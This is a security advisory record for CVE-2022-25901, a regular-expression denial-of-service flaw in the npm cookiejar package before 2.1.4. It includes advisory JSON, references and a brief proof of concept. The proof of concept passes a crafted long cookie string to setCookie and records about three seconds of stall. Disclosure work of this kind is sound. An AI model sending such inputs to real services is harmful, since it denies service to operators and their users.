ghsa-h452-7996-h45h
Vulnerability from github
Published
2023-01-18 06:31
Modified
2023-01-23 16:59
Severity ?
Summary
cookiejar Regular Expression Denial of Service via Cookie.parse function
Details
Versions of the package cookiejar before 2.1.4 are vulnerable to Regular Expression Denial of Service (ReDoS) via the Cookie.parse function and other aspects of the API, which use an insecure regular expression for parsing cookie values. Applications could be stalled for extended periods of time if untrusted input is passed to cookie values or attempted to parse from request headers.
Proof of concept:
``` ts\nconst { CookieJar } = require("cookiejar");
const jar = new CookieJar();
const start = performance.now();
const attack = "a" + "t".repeat(50_000); jar.setCookie(attack);
console.log(CookieJar.setCookie(): ${performance.now() - start}ms);
```
CookieJar.setCookie(): 2963.214399999939ms
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "cookiejar"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.1.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.webjars.npm:cookiejar"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "2.1.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-25901"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2023-01-23T16:59:52Z",
"nvd_published_at": "2023-01-18T05:15:00Z",
"severity": "MODERATE"
},
"details": "Versions of the package cookiejar before 2.1.4 are vulnerable to Regular Expression Denial of Service (ReDoS) via the `Cookie.parse` function and other aspects of the API, which use an insecure regular expression for parsing cookie values. Applications could be stalled for extended periods of time if untrusted input is passed to cookie values or attempted to parse from request headers.\n\nProof of concept:\n\n```\nts\\nconst { CookieJar } = require(\"cookiejar\");\n\nconst jar = new CookieJar();\n\nconst start = performance.now();\n\nconst attack = \"a\" + \"t\".repeat(50_000);\njar.setCookie(attack);\n\nconsole.log(`CookieJar.setCookie(): ${performance.now() - start}ms`);\n\n```\n\n```\nCookieJar.setCookie(): 2963.214399999939ms\n```",
"id": "GHSA-h452-7996-h45h",
"modified": "2023-01-23T16:59:52Z",
"published": "2023-01-18T06:31:03Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25901"
},
{
"type": "WEB",
"url": "https://github.com/bmeck/node-cookiejar/pull/39"
},
{
"type": "WEB",
"url": "https://github.com/bmeck/node-cookiejar/pull/39/commits/eaa00021caf6ae09449dde826108153b578348e5"
},
{
"type": "PACKAGE",
"url": "https://github.com/bmeck/node-cookiejar"
},
{
"type": "WEB",
"url": "https://github.com/bmeck/node-cookiejar/blob/master/cookiejar.js#23L73"
},
{
"type": "WEB",
"url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3176681"
},
{
"type": "WEB",
"url": "https://security.snyk.io/vuln/SNYK-JS-COOKIEJAR-3149984"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "cookiejar Regular Expression Denial of Service via Cookie.parse function"
}
Loading...
Loading...
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.